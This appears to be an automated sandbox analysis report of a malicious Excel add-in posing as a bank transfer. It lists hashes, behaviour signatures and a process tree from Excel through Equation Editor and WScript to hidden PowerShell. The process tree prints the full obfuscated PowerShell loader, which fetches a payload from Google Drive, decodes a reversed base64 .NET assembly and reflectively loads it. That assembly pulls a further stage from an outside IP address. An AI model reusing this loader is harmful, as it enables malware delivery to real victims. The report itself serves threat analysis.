Analysis
-
max time kernel
118s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
26-10-2024 05:48
Static task
static1
Behavioral task
behavioral1
Sample
transferencia interbancaria_667553466579.xlam
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
transferencia interbancaria_667553466579.xlam
Resource
win10v2004-20241007-en
General
-
Target
transferencia interbancaria_667553466579.xlam
-
Size
596KB
-
MD5
1ae6847360fe3bb54193d6009b0c024c
-
SHA1
9a1b6a797a07ed45ca653f961837f8cd0a8d181c
-
SHA256
7b2d140ba3e0b4d4314218b60f89e57491385f357a277d8caed2c2d950383739
-
SHA512
4c3c081453f6c560c5f9b8cb33a4749cf1d8c25836da4df67034cb8ed3ae1ae82c17b593e483afb461e1ba69ba5bedcc4642b70547ae07660ac5453b440bd548
-
SSDEEP
12288:2KuRV8lIiUy6at3sbD91hmnF0+3KZ3BhP3CZ8UUqud5yM:pIA6m3sv7hmnFbwh/CZ8tWM
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
Signatures
-
Blocklisted process makes network request 5 IoCs
flow pid Process 3 2832 EQNEDT32.EXE 6 2628 WScript.exe 7 2628 WScript.exe 9 2288 powershell.exe 11 2288 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 2212 powershell.exe 2288 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 9 drive.google.com 8 drive.google.com -
Drops file in System32 directory 2 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EXCEL.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EQNEDT32.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
pid Process 2832 EQNEDT32.EXE -
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 6 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 7 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2772 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2212 powershell.exe 2288 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2212 powershell.exe Token: SeDebugPrivilege 2288 powershell.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 2772 EXCEL.EXE 2772 EXCEL.EXE 2772 EXCEL.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 2832 wrote to memory of 2628 2832 EQNEDT32.EXE 32 PID 2832 wrote to memory of 2628 2832 EQNEDT32.EXE 32 PID 2832 wrote to memory of 2628 2832 EQNEDT32.EXE 32 PID 2832 wrote to memory of 2628 2832 EQNEDT32.EXE 32 PID 2628 wrote to memory of 2212 2628 WScript.exe 33 PID 2628 wrote to memory of 2212 2628 WScript.exe 33 PID 2628 wrote to memory of 2212 2628 WScript.exe 33 PID 2628 wrote to memory of 2212 2628 WScript.exe 33 PID 2212 wrote to memory of 2288 2212 powershell.exe 35 PID 2212 wrote to memory of 2288 2212 powershell.exe 35 PID 2212 wrote to memory of 2288 2212 powershell.exe 35 PID 2212 wrote to memory of 2288 2212 powershell.exe 35
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\transferencia interbancaria_667553466579.xlam"1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2772
-
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:2832 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\fridaydatingloversss.vbs"2⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2628 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHZlUmJvc2VwcmVGZXJFTkNlLlRPU3RySW5nKClbMSwzXSsnWCctSk9JbicnKSAoKCgnWnZWaW1hZ2VVJysncmwgPSB5a3hodHQnKydwczovL2RyaXZlLmdvb2dsZS5jbycrJ20vdWM/ZXhwb3J0PWRvd24nKydsb2FkJmlkPTFBSVZnSkpKdjFGNnYnKydTNHNVT3libkgtc0R2VWhCWXd1ciB5a3g7WnZWd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeScrJ3N0ZW0uTmV0LldlYkNsaWVudDtadlZpbWFnZUJ5dGVzID0gWnZWd2ViQ2xpZW50LkRvd25sb2FkRGF0YShadlZpbWFnZVVybCknKyc7WnZWaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoWnZWaW1hZ2VCeXRlcycrJyk7WicrJ3ZWc3RhcnRGbGFnID0gJysneWt4PDwnKydCQVNFNjRfU1RBUicrJ1Q+PnlreDtadlZlbmRGbGFnID0geWt4PDxCQVNFNjRfRU5EPj55a3g7WnZWc3RhcnRJbmRleCA9IFp2VmltYWdlVGV4dC5JbmRleE9mKFp2VnN0YXJ0RmxhZyk7WnZWZW5kSW5kZXggPSBadlZpbWFnZVRleHQuSW5kZXhPZihadlZlbmRGbGFnKTtadlZzdGFydEluZGV4IC1nZSAwIC1hbmQgWnZWZW5kSW5kZXggLWd0IFp2VnN0YXJ0SW5kZXgnKyc7WnZWc3RhcnRJbmRlJysneCArPSBadlZzdGFydEZsYWcuTGVuZ3RoO1p2VmJhc2U2NExlbmd0aCA9IFp2VmVuZEluZGV4IC0gWnZWc3RhcnRJbmRleDtadlZiYXNlNjRDb21tYW5kID0gWnZWaW1hZ2VUZXh0LlN1YnN0cmluZyhaJysndlZzdGFyJysndEluZGV4LCcrJyBadlZiYXNlNicrJzRMZW5ndGgpO1p2VmJhc2U2NFJldmVyc2VkID0gLWpvaW4gKFp2VmJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBnQm8gRm8nKydyRWFjaC1PYmplY3QgeyBadlZfICcrJ30pWy0xLi4tKFp2VmJhc2U2NENvbW1hbmQuTGVuZ3RoKV07WnZWY29tbWFuJysnZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTonKyc6RnJvJysnbUJhc2U2NFN0cmluZyhadlZiYXNlNjRSZXZlcnNlZCk7WnZWbG9hZGVkQXNzZW1ibHkgPScrJyBbU3lzdGUnKydtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFp2VmNvbW1hbmRCeXRlcyk7WnZWdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdJysnLkdldE1ldGhvZCh5a3hWQUl5a3gpO1p2VnZhaU1ldGhvZC5JbnZva2UnKycoWnZWbnVsbCwgQCh5a3h0eHQueWFhYWFhYmV3bWFkYW1zc3NzeWFkaXJmJysnLzMxLjEzLjI3MS43MDEvLzpwdHRoeWt4LCB5a3hkZXNhdGl2YWRveWt4LCB5a3hkZXNhdGl2YWRveWt4LCcrJyAnKyd5a3hkZXNhdGl2YWRveWt4LCB5aycrJ3hBZGRJblByb2Nlc3MzMnlreCwgeWsnKyd4ZGVzYXRpdmFkb3lreCwgeWt4ZCcrJ2VzYXRpdmFkb3lreCx5a3hkZXNhdGl2YWRveWt4LHlreGRlc2F0aXZhZG95a3gnKycsJysneWt4ZGVzYXRpdmFkb3lreCwnKyd5a3hkZXNhdGl2YWRveWt4LHlreGRlc2F0aXZhZG95a3gseWt4MXlreCx5a3hkZScrJ3NhdGl2YWRveWsnKyd4KSk7JyktUkVQTGFDRSAoW0NoYXJdMTAzK1tDaGFyXTY2K1tDaGFyXTExMSksW0NoYXJdMTI0LUNyZVBsYUNlIChbQ2hhcl0xMjErW0NoYXJdMTA3K1tDaGFyXTEyMCksW0NoYXJdMzkgIC1DcmVQbGFDZSAgKFtDaGFyXTkwK1tDaGFyXTExOCtbQ2hhcl04NiksW0NoYXJdMzYpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2212 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $veRbosepreFerENCe.TOStrIng()[1,3]+'X'-JOIn'') ((('ZvVimageU'+'rl = ykxhtt'+'ps://drive.google.co'+'m/uc?export=down'+'load&id=1AIVgJJJv1F6v'+'S4sUOybnH-sDvUhBYwur ykx;ZvVwebClient = New-Object Sy'+'stem.Net.WebClient;ZvVimageBytes = ZvVwebClient.DownloadData(ZvVimageUrl)'+';ZvVimageText = [System.Text.Encoding]::UTF8.GetString(ZvVimageBytes'+');Z'+'vVstartFlag = '+'ykx<<'+'BASE64_STAR'+'T>>ykx;ZvVendFlag = ykx<<BASE64_END>>ykx;ZvVstartIndex = ZvVimageText.IndexOf(ZvVstartFlag);ZvVendIndex = ZvVimageText.IndexOf(ZvVendFlag);ZvVstartIndex -ge 0 -and ZvVendIndex -gt ZvVstartIndex'+';ZvVstartInde'+'x += ZvVstartFlag.Length;ZvVbase64Length = ZvVendIndex - ZvVstartIndex;ZvVbase64Command = ZvVimageText.Substring(Z'+'vVstar'+'tIndex,'+' ZvVbase6'+'4Length);ZvVbase64Reversed = -join (ZvVbase64Command.ToCharArray() gBo Fo'+'rEach-Object { ZvV_ '+'})[-1..-(ZvVbase64Command.Length)];ZvVcomman'+'dBytes = [System.Convert]:'+':Fro'+'mBase64String(ZvVbase64Reversed);ZvVloadedAssembly ='+' [Syste'+'m.Reflection.Assembly]::Load(ZvVcommandBytes);ZvVvaiMethod = [dnlib.IO.Home]'+'.GetMethod(ykxVAIykx);ZvVvaiMethod.Invoke'+'(ZvVnull, @(ykxtxt.yaaaaabewmadamssssyadirf'+'/31.13.271.701//:ptthykx, ykxdesativadoykx, ykxdesativadoykx,'+' '+'ykxdesativadoykx, yk'+'xAddInProcess32ykx, yk'+'xdesativadoykx, ykxd'+'esativadoykx,ykxdesativadoykx,ykxdesativadoykx'+','+'ykxdesativadoykx,'+'ykxdesativadoykx,ykxdesativadoykx,ykx1ykx,ykxde'+'sativadoyk'+'x));')-REPLaCE ([Char]103+[Char]66+[Char]111),[Char]124-CrePlaCe ([Char]121+[Char]107+[Char]120),[Char]39 -CrePlaCe ([Char]90+[Char]118+[Char]86),[Char]36) )"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2288
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5e5682dca8a78f9aeb6325f4a792b160d
SHA19bfd29e952568589ea5f2836e182637ecddee264
SHA256728ceb7ccf51279abec4598e55de7017a5da21f6e647d4239e3dd44dc6bfc22a
SHA51275d29c36726a30c0d554c4132c96c2164a54532bdb8c5a99f94894a98c9463787b5c508ad09c8d63d849cb099d1fc5ced94b6a5c08d9b51e97d275670ebc66d6
-
Filesize
69KB
MD592361fe6feb25c67dae9dfefee911404
SHA1e52f98e972a02327b74e9a9b4ea91a670975611b
SHA25616dfc05a6ccd93a5d80cb362553f196b5943b65db5028cb408e8d0e68f30c827
SHA512bbdc4d9f5dbe52ef0c4949452342888d67b364bceeb533938bf98f9b24521961d7434ef804bfeb78ae6c59125ad51ef98b82dcb3160120e9e5b2cfeba8d9f878